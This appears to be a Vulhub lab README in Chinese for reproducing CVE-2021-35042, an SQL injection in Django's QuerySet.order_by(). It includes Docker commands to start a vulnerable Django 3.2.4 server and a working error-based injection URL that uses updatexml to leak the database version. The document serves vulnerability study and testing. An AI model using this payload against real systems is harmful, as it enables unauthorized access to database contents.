Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
1.2 KiB
1.2 KiB
Django QuerySet.order_by()函数SQL注入漏洞(CVE-2021-35042)
Django是一个高级的Python Web框架,支持快速开发和简洁实用的设计。
Django在2021年7月1日发布了安全更新,修复了在QuerySet.order_by()函数中存在的SQL注入漏洞。该漏洞影响Django 3.2.5、3.1.13和2.2.24之前的版本。
当用户可以控制传递给order_by()函数的输入时,可以在预期的列位置进行SQL注入攻击。
参考链接:
环境搭建
执行如下命令编译并启动一个存在漏洞的Django 3.2.4服务器:
docker compose build
docker compose up -d
环境启动后,访问http://your-ip:8000即可看到Django默认首页。
漏洞复现
首先访问http://your-ip:8000/vuln/,并添加参数order=-id以查看按ID降序排序的数据:
要利用SQL注入漏洞,使用以下payload修改order参数,其中vuln_collection是模型名称:
http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
SQL错误信息将会显示,通过基于错误的SQL注入泄露数据库信息:
